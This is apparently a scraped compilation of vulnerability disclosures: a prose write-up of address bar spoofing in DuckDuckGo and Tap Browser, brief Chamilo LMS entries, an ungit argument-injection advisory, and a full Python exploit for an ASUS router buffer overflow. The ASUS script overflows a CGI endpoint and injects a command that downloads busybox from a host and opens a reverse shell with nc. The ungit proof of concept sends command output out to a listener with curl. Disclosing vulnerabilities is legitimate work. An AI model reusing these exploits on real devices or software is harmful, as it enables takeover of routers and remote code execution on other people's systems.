Address bar spoofing traditionally scores approximately 4.3 out of 10 on the Common Vulnerability Scoring System (CVSS), technically assigning address bar spoofing with a moderate impact.

However, given the substantial 667% rise in spear-phishing attacks experienced during the COVID-19 pandemic, mobile address bar spoofing should arguably be held in higher regard. In a survey conducted by Mimecast, 2.1 million domains were tied to phishing attacks, with 47% of successful attacks making use of fraudulent websites. The disclosed DuckDuckGo and Tap Browser vulnerabilities directly tie into these figures by allowing cybercriminals to make fraudulent websites more believable and, therefore, more successful in harvesting sensitive information.

**DuckDuckGo**

‘Hatched’ in 2008, DuckDuckGo has become a popular web browsing tool downloaded 5 million times per month as a mobile application or desktop extension. It gives users the ability to browse the web privately, while protecting users from internet trackers.

The recent address bar spoofing CVE-2021-44683 disclosed by Baloch and Samak considerably weakens DuckDuckGo’s promised privacy protections for iOS users.

In the proof of concept (POC), Baloch and Samak revealed that version 7.64.4 of DuckDuckGo’s iOS application was prone to address bar spoofing due to a mishandling of JavaScript’s window.open function used to open a secondary window.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-POC-copy-1.jpg)

DuckDuckGo address bar spoofing POC

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-Evidence.jpg)

DuckDuckGo address bar spoofing evidence

When exploited by a bad actor, an address bar in a secondary window opened in DuckDuckGo would display a legitimate URL despite being hosted by an attacker. This fraudulent page could be designed to trick users into supplying sensitive PII such as usernames and passwords.

**Tap Browser**

Built exclusively for iOS, Tap Browser is used for its additional web browsing functionalities such as easy navigation icons, in-app media players and an in-built VPN service.

Although a relatively low user base (7,000 downloads), the Tap Browser address bar spoofing vulnerability part of the CVE-2021-44683 disclosed by Baloch and Samak was open to secondary window exploitation.

In the POC, Baloch and Samak demonstrated how a secondary window could be spoofed by a bad actor to replicate Facebook, Gmail, Apple and Bing browsers.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-1.jpg)

1\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS1.png)

1\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-2.jpeg)

2\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS2.png)

2\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-3.jpeg)

3\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS3.png)

3\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-4.jpg)

4\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS4.png)

4\. Evidence of address bar spoofing in Tap Browser

**Response from Vendors**

**Vendor**

**Service**

**Version**

**Platform**

**Reported Date**

**Fixed**

**CVE**

DuckDuckGo

DuckDuckGo

7.64.4

iOS

26/09/21

7.64.18

CVE-2021-44683

Tap Browser

Tap Browser

1.2

iOS

26/09/21

Unfixed

N/A

**HexCon Talk on Address Bar Spoofing Flaws**

This is not the first time, Rafay Baloch has found flaws in browsers. In October 2021 at the Hexcon Security conference, Rafay Baloch presented his findings across various mobile browsers titled “What you see, is not always what you get”. Various categories of address bar spoofing vulnerabilities were discussed along with how these vulnerabilities can be used to abuse security mechanisms in browsers.

**Previous CVEs Disclosed by Cyber Citadel Researchers**

This disclosure by Cyber Citadel security researchers comes a year after Rafay Baloch teamed up with Rapid7’s Director of Research Tod Beardsley to disclose a similar address bar vulnerability across seven mobile web browsers including Apple Safari and Opera Touch.

Baloch reported multiple vulnerabilities on Chrome and Firefox browsers in 2016, Google Inc’s Android browser in 2014, and was paid a total of US$10,000 for reporting a Code Execution/Command Execution vulnerability on PayPal’s sub-domain in 2012. He is considered one of the world’s top ethical hackers and listed in the Google, Facebook, PayPal and Microsoft Hall of Fame.

CVE-2021-44683: Multiple Address Bar Spoofing Flaws in Mobile Browsers - Cyber Citadel

ASUS AC68U <=3.0.0.4.385.20852 is affected by a buffer overflow in blocking.cgi, which may cause a denial of service (DoS).

AC68U FirmwareVersion < 3.0.0.4.385.20633  
RT-AC5300 FirmwareVersion <3.0.0.4.384.82072  
. . . . . .  
此漏洞影响多个路由器型号，具体型号暂未统计，官方2020年8-9月份修复的RCE漏洞（如下图）似乎就是这个  
![image](https://user-images.githubusercontent.com/45091804/146535975-97051c7f-a65e-465a-8ed6-bc15ae5f6e6c.png)

①系统时间+3600-atol(timestap参数)<20 （timestap参数:通过一次空包返回内容来计算时间戳（注意需要根据设备系统设置时区计算） ![image](https://user-images.githubusercontent.com/45091804/146538461-c4dcb76e-d911-42c3-8c2d-ba7e1309f06f.png)  
②sub\_11840函数为nvram\_get，初始MULTIFILTER\_MAC值为空，str("",mac)，所以mac必须为空  

    #coding=utf-8
    from pwn import *
    import re
    import time
    import requests
    import urlparse
    import urllib3
    urllib3.disable_warnings()
    import sys
    
    def rematch(strTmp):
        tm_year = strTmp[0][2]
        tm_month = strTmp[0][1]
        tm_day = strTmp[0][0]
        tm_hour = strTmp[0][3]
        tm_min = strTmp[0][4]
        tm_sec = strTmp[0][5]
        if tm_month == 'Jan':
            tm_month = '01'
        if tm_month == 'Feb':
            tm_month = '02'
        if tm_month == 'Mar':
            tm_month = '03'
        if tm_month == 'Apr ':
            tm_month = '04'
        if tm_month == 'May':
            tm_month = '05'
        if tm_month == 'Jun':
            tm_month = '06'
        if tm_month == 'Jul':
            tm_month = '07'
        if tm_month == 'Aug':
            tm_month = '08'
        if tm_month == 'Sept':
            tm_month = '09'
        if tm_month == 'Oct':
            tm_month = '10'
        if tm_month == 'Nov':
            tm_month = '11'
        if tm_month == 'Dec':
            tm_month = '12'
        tm_hour = int(tm_hour) + 8  # +8对应时区
        time_tmp = '{}-{}-{} {}:{}:{}'.format(tm_year, tm_month, tm_day, tm_hour, tm_min, tm_sec)
        print(time_tmp)
        ts = time.strptime(time_tmp, "%Y-%m-%d %H:%M:%S")
        timeStamp= int(time.mktime(ts))
        return timeStamp
    
    
    def getTime(url):
        scheme =  urlparse.urlparse(url).scheme
        hostname = urlparse.urlparse(url).hostname
        header={
            'Host': hostname,
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'Origin': scheme+'://'+hostname,
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Referer': scheme+'://'+hostname,
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection':'close'
        }
        data1 ={
            'CName': '',
            'mac': '',
            'interval': '',
            'timestap': '',
        }
        url = url+'/blocking_request.cgi'
        ret = requests.post(url = url ,
                      headers = header,
                      data = data1,
                      verify=False)
        format_time =''
        for key, value in (ret.headers).items():
            if 'Date' in key:
                format_time = value
        tmp = re.findall(r', (.*?) (.*?) (.*?) (.*?):(.*?):(.*?) GMT',format_time)
        timeStap = rematch(tmp) + 3600
        timeStapStr = str(timeStap)
        print(timeStapStr)
        data2 ={
            'CName': 'cd /tmp/home/root;wget http://192.168.2.177:8080/busybox-armv6l;chmod 777 *;./busybox-armv6l nc 192.168.2.177:1234 -e /bin/ash',
            'mac': '',
            'interval': 'a'*12+p32(1)+'a'*16+p32(0x0000EFA8),   
            'timestap': timeStapStr +'a'*4740+p32(0x0006FE35),   #p32(addr) 此addr为interval参数内容首地址
    
        }
        ret = requests.post(url = url ,
                      headers = header,
                      data = data2,
                      verify=False,)
        print('End')
    
    
    if __name__ == '__main__':
        url = sys.argv[1]
        getTime(url)

CVE-2021-45757: GitHub - IBUILI/Asus

A Cross-Site Request Forgery (CSRF) in Chamilo LMS 1.11.14 allows attackers to execute arbitrary commands on victim hosts via user interaction with a crafted URL.

CVE-2021-40662: Security issues - Chamilo LMS

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.

CVE-2021-38745: Security issues - Chamilo LMS

The package ungit before 1.5.20 are vulnerable to Remote Code Execution (RCE) via argument injection. The issue occurs when calling the /api/fetch endpoint. User controlled values (remote and ref) are passed to the git fetch command. By injecting some git options it was possible to get arbitrary command execution.

source: snyk.io

**Vulnerability: Remote Code Execution****Affected Version: \*****Technical Details:**

It's possible to get remote code execution via argument injection.

The issue occurs when calling the /api/fetch endpoint. The user input is passed to the git subcommand fetch. Even if a safe API like spawn is used to execute shell commands (

const gitProcess \= child\_process.spawn(gitBin, args.commands, procOpts);

), in this specific case it's still possible to run arbitrary commands via argument injection.

The fetch subcommand accepts a special argument --upload-pack (https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---upload-packltupload-packgt). Since the user controls two values provided to the fetch git subcommand (remote and ref), it is possible to execute arbitrary commands by providing the remote value to be --upload-pack="command to execute". The command executed will be similar to the following:

git fetch --upload-pack="command to execute" foobar

Here is the code that accepts these values:

//

'fetch',

req.body.remote,

req.body.ref ? req.body.ref : '',

config.autoPruneOnFetch ? '--prune' : '',

app.post(  
`${exports.pathPrefix}/fetch`,  
ensureAuthenticated,  
ensurePathExists,  
ensureValidSocketId,  
(req, res) => {  
// Allow a little longer timeout on fetch (10min)  
if (res.setTimeout) res.setTimeout(tenMinTimeoutMs);

      const task = gitPromise({
        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          req.body.remote,
          req.body.ref ? req.body.ref : '',
          config.autoPruneOnFetch ? '--prune' : '',
        ]),
        repoPath: req.body.path,
        timeout: tenMinTimeoutMs,
      });
    
      jsonResultOrFailProm(res, task).finally(emitGitDirectoryChanged.bind(null, req.body.path));
    }
    

);

**Potential Fix**

A possible remediation to fix this issue could be to add -- (see here for more information about it https://git-scm.com/docs/gitcli/2.25.0#\_description) before the user provided values (it's just a suggestion):

        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          config.autoPruneOnFetch ? '--prune' : '',
          '--',
          req.body.remote,
          req.body.ref ? req.body.ref : ''
        ]),
    

**Proof Of Concept/Steps to Reproduce**

Install ungit and setup a project (I used ungit repo itself)  
cd /home/ubuntu/poc/  
npm install -g ungit  
git clone https://github.com/FredrikNoren/ungit.git  
cd ungit/  
ungit  
the project will be available at http://localhost:8448/#/repository?path=/home/ubuntu/poc/ungit  
RCE Exploitation  
setup a listener for accepting incoming connections:  
nc -nvlp 8000

run the following curl command to get the output of the id command:  
curl -d '{"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data "$(id)"","ref":"foobar","socketId":1}' -H "Content-Type: application/json" -X POST http://localhost:8448/api/fetch

This is the same request sent:

    POST /api/fetch HTTP/1.1
    Host: localhost:8448
    Content-Length: 134
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json
    Content-Type: application/json
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://localhost:8448/
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: [http://localhost:8448/
    Accept-Encoding](http://localhost:8448/%0DAccept-Encoding): gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data \"$(id)\"",
    "ref":"foobar",
    "socketId":1}

Tag

#apple